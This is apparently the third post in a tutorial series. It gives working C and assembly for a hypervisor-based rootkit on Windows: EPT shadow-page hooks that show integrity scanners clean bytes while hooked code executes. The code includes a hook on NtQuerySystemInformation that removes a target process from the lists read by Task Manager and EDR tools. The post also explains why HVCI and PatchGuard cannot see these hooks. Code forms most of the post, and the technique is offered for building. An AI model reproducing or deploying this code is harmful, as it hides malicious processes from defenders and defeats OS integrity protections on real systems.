[Hypervisor Part 3] Making Your Kernel Hook Invisible with EPT Shadow Pages
Part 1 introduced the hypervisor architecture. Part 2 covered the detour, hypercall ABI, and cross-process memory via CR3. This post covers what we actually do with that infrastructure: EPT shadow page hooks that hide kernel modifications from every integrity scanner running inside the guest.
What an EPT shadow page hook is
EPT (Extended Page Tables) is the second stage of memory translation that the CPU applies when a guest OS is running under a hypervisor. The guest manages its own page tables (guest virtual → guest physical). The hypervisor manages EPT (guest physical → host physical). Every memory access in the guest goes through both.
The insight: EPT is per-hypervisor, not per-process. Guest software — including the Windows kernel — cannot see or modify EPT entries. But we can, from our hypervisor code.
A shadow page hook creates a split view of a single guest-physical page:
- When the guest reads the page (checking code integrity, walking the IAT, verifying a pointer), it sees the original, unmodified bytes — EPT maps the read access to the real physical frame.
- When the guest executes the page, EPT maps it to a shadow frame containing our hook bytes.
An integrity scanner calling ReadProcessMemory on ntoskrnl.exe, computing a hash of the function it thinks we hooked, sees clean code. The CPU, when it fetches instructions from the same virtual address, executes our hook. The two views coexist.
The hook_entry_t structure
Every hooked page is tracked by a compact bitfield struct. We pack everything into 8 bytes to keep the hook table cache-friendly:
// Compact hook descriptor — 8 bytes total
// Sits in a flat array indexed by guest PFN; lookup is O(1)
struct hook_entry_t {
uint64_t original_pfn : 24; // host PFN of unmodified page (max 64 TB)
uint64_t shadow_pfn : 24; // host PFN of shadow page with hook bytes
uint64_t access_mask : 3; // current EPT permission bits (R/W/X)
uint64_t hooked : 1; // 1 = this entry is active
uint64_t has_pre_stub : 1; // 1 = pre_stub allocated for this hook
uint64_t has_post_stub : 1; // 1 = post_stub allocated
uint64_t reserved : 10; // padding to 64 bits
};24-bit PFNs support up to 64 TB of host physical memory per field (24 bits × 4KB pages). The access_mask reflects the current EPT permission bits — the hypervisor updates this on every EPT violation so it knows what to swap.
Installing a hook
Installing a shadow page hook involves four steps: allocate a shadow page, write the hook bytes, build the EPT split, and register the entry.
NTSTATUS add_slat_code_hook(
uint64_t target_guest_pa, // guest-physical address to hook
uint64_t hook_fn_hpa, // host-physical address of our replacement function
uint64_t pre_stub_hpa, // host-physical address of pre-call stub
uint64_t post_stub_hpa) // host-physical address of post-call stub
{
uint64_t target_pfn = target_guest_pa >> 12;
uint64_t page_offset = target_guest_pa & 0xFFF;
// 1. Allocate shadow page, copy original content
uint64_t shadow_hpa = alloc_host_page();
uint64_t original_hpa = ept_get_mapping(target_pfn); // current EPT mapping
memcpy(hpa_to_va(shadow_hpa), hpa_to_va(original_hpa), 0x1000);
// 2. Write a 14-byte absolute JMP at page_offset in the shadow page
// FF 25 00 00 00 00 [8-byte absolute addr] = JMP [rip+0]
uint8_t *patch_site = (uint8_t *)hpa_to_va(shadow_hpa) + page_offset;
uint8_t jmp14[14] = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00, 0,0,0,0,0,0,0,0};
*(uint64_t *)(jmp14 + 6) = pre_stub_guest_va(pre_stub_hpa);
memcpy(patch_site, jmp14, 14);
// 3. Split the EPT entry
// Execute access → shadow page (hook bytes)
// Read/write access → original page (clean bytes)
ept_set_mapping(target_pfn, shadow_hpa, EPT_X);
ept_set_read_mapping(target_pfn, original_hpa);
// 4. Register in hook table
hook_table[target_pfn] = (hook_entry_t){
.original_pfn = original_hpa >> 12,
.shadow_pfn = shadow_hpa >> 12,
.access_mask = EPT_X,
.hooked = 1,
.has_pre_stub = (pre_stub_hpa != 0),
.has_post_stub = (post_stub_hpa != 0),
};
// 5. Invalidate EPT TLB so the change takes effect immediately
ept_invalidate(target_pfn);
return STATUS_SUCCESS;
}The key detail is ept_set_mapping vs ept_set_read_mapping. EPT controls Read, Write, and Execute independently. We start with the mapping at EPT_X (execute only, shadow page). Any read access fires an EPT violation, which swaps to the original before the read completes.
Handling EPT violations
Every split-page access that doesn’t match the current permission bits causes an EPT violation VM-exit. handle_slat_violation() (called from the detour in Part 2) reads the exit qualification and flips the mapping:
void handle_slat_violation(void)
{
// Intel SDM: EPT violation qualification (VMCS 0x6400), guest physical addr (0x2400)
uint64_t qual = vmread(VMCS_EXIT_QUALIFICATION);
uint64_t guest_pa = vmread(VMCS_GUEST_PHYSICAL_ADDR);
uint64_t target_pfn = guest_pa >> 12;
hook_entry_t *entry = &hook_table[target_pfn];
if (!entry->hooked) {
inject_page_fault(guest_pa);
return;
}
// Qualification bits: bit 0 = read, bit 1 = write, bit 2 = execute
bool is_execute = (qual & 4) != 0;
if (is_execute) {
// Execute access: switch to shadow page (hook bytes)
ept_set_mapping(target_pfn, (uint64_t)entry->shadow_pfn << 12, EPT_X);
entry->access_mask = EPT_X;
} else {
// Read/write access: switch to original page (clean bytes)
ept_set_mapping(target_pfn, (uint64_t)entry->original_pfn << 12, EPT_R | EPT_W);
entry->access_mask = EPT_R | EPT_W;
}
ept_invalidate(target_pfn);
// Caller does VMRESUME — the faulting access is retried immediately
}One EPT violation fires per transition between read-mode and execute-mode for a given page. In normal operation (code running, no concurrent integrity scan), the page stays in EPT_X mode and no violations occur. The overhead shows up only when a scanner reads the page.
Pre and post stubs
The shadow page JMPs to a pre-stub that runs before our hook logic. The stub saves registers and records the call context keyed by CR3 (current page directory base register — identifies the process address space, stable across VP migrations):
; pre_stub for NtQuerySystemInformation hook
pre_stub:
push rax
push rcx
push rdx
push r8
push r9
push r10
push r11
; Save SystemInformationClass (rcx) so post-stub can decide whether to sanitise
mov rax, rcx
; Pre-notify hypercall: CPUID with packed hypercall_info_t in RCX
; RDX = current CR3 (process identity for pairing with post-stub)
; R8 = arg0 (SystemInformationClass)
; R9 = return address (so post-stub can restore it)
mov rdx, cr3
mov r8, rax
mov r9, [rsp + 0x38] ; saved return address (above pushed regs)
mov ecx, HYPERCALL_HOOK_PRE ; packed hypercall_info_t value
cpuid ; → VM-exit → hook_pre_notify(cr3, arg0, ret_addr)
; Swap return address → post_stub so we intercept the function's return
lea rax, [rip + post_stub]
mov [rsp + 0x38], rax
pop r11
pop r10
pop r9
pop r8
pop rdx
pop rcx
pop rax
jmp [rip + trampoline_ptr] ; → original function (stolen bytes + JMP back)The post-stub runs where the original function would have returned. At that point, NtQuerySystemInformation has already filled the caller’s buffer:
post_stub:
push rax ; save return value (NTSTATUS)
push rcx
push rdx
; Post-notify hypercall: hypervisor looks up context by CR3,
; reads SystemInformationLength from saved args,
; calls sanitise_process_info() on the output buffer
mov rdx, cr3
mov ecx, HYPERCALL_HOOK_POST
cpuid ; → VM-exit → handle post-hook sanitisation
pop rdx
pop rcx
pop rax
jmp [rip + original_return_ptr] ; back to original callerSanitising NtQuerySystemInformation
NtQuerySystemInformation(SystemProcessInformation=5) returns a flat buffer of SYSTEM_PROCESS_INFORMATION structures linked by NextEntryOffset. This is what Task Manager, Process Explorer, and every EDR process enumerator reads.
The relevant fields:
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset; // byte offset to next entry; 0 = last
ULONG NumberOfThreads;
// ... several timing/stat fields ...
UNICODE_STRING ImageName;
LONG BasePriority;
HANDLE UniqueProcessId;
// ...
} SYSTEM_PROCESS_INFORMATION;Removing a process from the list means stitching over it: the previous entry’s NextEntryOffset needs to skip the target entry entirely.
void sanitise_process_info(uint64_t buffer_gva, uint32_t buf_size,
uint32_t target_pid, uint64_t guest_cr3)
{
uint64_t cursor = buffer_gva;
uint64_t prev_gva = 0; // GVA of previous entry (for stitching)
uint32_t prev_next = 0; // previous entry's NextEntryOffset value
while (1) {
SYSTEM_PROCESS_INFORMATION entry;
if (!read_guest_virtual_memory(&entry, cursor, guest_cr3, sizeof(entry)))
break;
uint32_t next_off = entry.NextEntryOffset;
uint32_t pid = (uint32_t)(uintptr_t)entry.UniqueProcessId;
if (pid == target_pid) {
uint32_t new_off;
if (prev_gva == 0) {
// Target is the head entry — move the second entry to position 0
// by adjusting the caller's buffer pointer (done via a separate
// hypercall that modifies the guest register holding the buffer base).
// Elided here; in practice the head case is handled separately.
} else {
// Middle or tail: update prev->NextEntryOffset to skip us
// If we are the last entry (next_off==0), set prev's offset to 0
new_off = (next_off == 0) ? 0 : (prev_next + next_off);
write_guest_virtual_memory(
prev_gva, // address of prev->NextEntryOffset
&new_off,
guest_cr3,
sizeof(new_off));
}
return;
}
if (next_off == 0) break;
prev_gva = cursor; // address of this entry's NextEntryOffset field
prev_next = next_off;
cursor += next_off;
}
}read_guest_virtual_memory and write_guest_virtual_memory are the Part 2 cross-process memory primitives — they translate guest virtual addresses through the provided CR3 using EPT. The buffer is in user-mode memory; the kernel has already written it by the time NtQuerySystemInformation returns. We modify it in the post-stub hypercall, in-flight, before control returns to the caller.
CR3 keying for pre/post pairing
The context table is indexed by CR3, not VP index, because threads migrate between virtual processors. A VP-keyed table breaks when a thread switches VPs between the pre and post stubs. CR3 identifies the address space and is stable for the lifetime of the process:
#define MAX_CONCURRENT_HOOKS 64
struct hook_context_t {
uint64_t cr3;
uint64_t arg0; // SystemInformationClass (or equivalent first arg)
uint64_t return_addr; // original return address, restored by post-stub
uint64_t in_use;
};
static hook_context_t g_hook_contexts[MAX_CONCURRENT_HOOKS];
void hook_pre_notify(uint64_t cr3, uint64_t arg0, uint64_t return_addr)
{
for (int i = 0; i < MAX_CONCURRENT_HOOKS; i++) {
if (!g_hook_contexts[i].in_use) {
g_hook_contexts[i] = (hook_context_t){cr3, arg0, return_addr, 1};
return;
}
}
// Table full — drop; post-stub finds no entry and skips sanitisation
}
hook_context_t *hook_post_get_and_clear(uint64_t cr3)
{
for (int i = 0; i < MAX_CONCURRENT_HOOKS; i++) {
if (g_hook_contexts[i].in_use && g_hook_contexts[i].cr3 == cr3) {
g_hook_contexts[i].in_use = 0;
return &g_hook_contexts[i];
}
}
return NULL;
}64 concurrent contexts is conservative — NtQuerySystemInformation calls for a process list don’t overlap in practice, but concurrent calls from different processes do stack up.
What HVCI stops and what it doesn’t
HVCI prevents guest-mode code from marking pages executable without hypervisor approval. It does not affect EPT. The shadow page is a host-physical allocation made by the hypervisor; HVCI has no authority over it. EPT entries are written by the hypervisor — guest-mode code can’t even read them.
This is the structural advantage of operating from below the guest OS. Guest-side security mechanisms — HVCI, Kernel Patch Protection (PatchGuard), object callback validation, code integrity checks — all run as guest software and can only see the view of memory that EPT allows them to see. They cannot check what they cannot read.
That’s the full series. Part 1 establishes the model. Part 2 builds the detour and hypercall ABI. This post builds the stealth hooks on top of that infrastructure.
There’s more to a production implementation — EPT table management, TLB shootdowns across VPs, large page handling, and identity-mapped regions all add complexity. But the core mechanism is exactly what’s described here: split EPT, two PFNs, swap on violation, sanitise in post-stub.